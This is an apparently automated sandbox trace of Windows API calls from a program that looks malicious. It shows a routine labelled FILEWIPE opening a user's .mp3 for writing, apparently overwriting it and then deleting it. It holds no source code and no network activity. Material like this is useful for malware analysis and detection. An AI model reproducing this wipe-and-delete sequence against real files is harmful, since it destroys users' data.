wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.175] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.175] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0038.175] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.175] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0038.175] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.176] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.176] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.176] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.176] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0038.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.176] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.176] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.176] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0038.176] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.176] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.176] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0038.176] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.176] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.176] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0038.176] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.177] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.177] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0038.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0038.177] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0038.177] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.177] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.177] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.177] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.178] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.178] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0038.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.178] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.178] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.178] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac52da0, ftCreationTime.dwHighDateTime=0x1d5c0fa, ftLastAccessTime.dwLowDateTime=0x2339e1c0, ftLastAccessTime.dwHighDateTime=0x1d5be98, ftLastWriteTime.dwLowDateTime=0x2339e1c0, ftLastWriteTime.dwHighDateTime=0x1d5be98, nFileSizeHigh=0x0, nFileSizeLow=0x16f92, dwReserved0=0x0, dwReserved1=0x777648, cFileName="__Hn.mp3", cAlternateFileName="")) returned 0x7c2100 [0038.178] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.179] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.179] CharLowerBuffW (in: lpsz="byte[94098]", cchLength=0xb | out: lpsz="byte[94098]") returned 0xb [0038.179] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.179] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.179] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.179] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.179] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.179] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0038.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.180] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.180] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.180] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.180] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0038.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.180] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.180] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.181] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.181] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\__hn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0038.181] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.181] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.182] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.182] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.182] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.182] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.182] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.182] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.182] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.182] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.182] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.182] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.182] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.182] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.182] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.183] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.183] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.183] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.183] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.183] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.183] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3", lpFilePart=0x0) returned 0x39 [0038.183] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac52da0, ftCreationTime.dwHighDateTime=0x1d5c0fa, ftLastAccessTime.dwLowDateTime=0x2339e1c0, ftLastAccessTime.dwHighDateTime=0x1d5be98, ftLastWriteTime.dwLowDateTime=0x16782a80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x16f92, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="__Hn.mp3", cAlternateFileName="")) returned 0x7c2100 [0038.183] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\__hn.mp3")) returned 1 [0038.184] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac52da0, ftCreationTime.dwHighDateTime=0x1d5c0fa, ftLastAccessTime.dwLowDateTime=0x2339e1c0, ftLastAccessTime.dwHighDateTime=0x1d5be98, ftLastWriteTime.dwLowDateTime=0x16782a80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x16f92, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="__Hn.mp3", cAlternateFileName="")) returned 0 [0038.185] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.185] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.185] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0038.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0038.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0038.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.185] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.185] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0038.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.185] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.185] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.186] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.186] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0038.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.186] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0038.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.186] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, 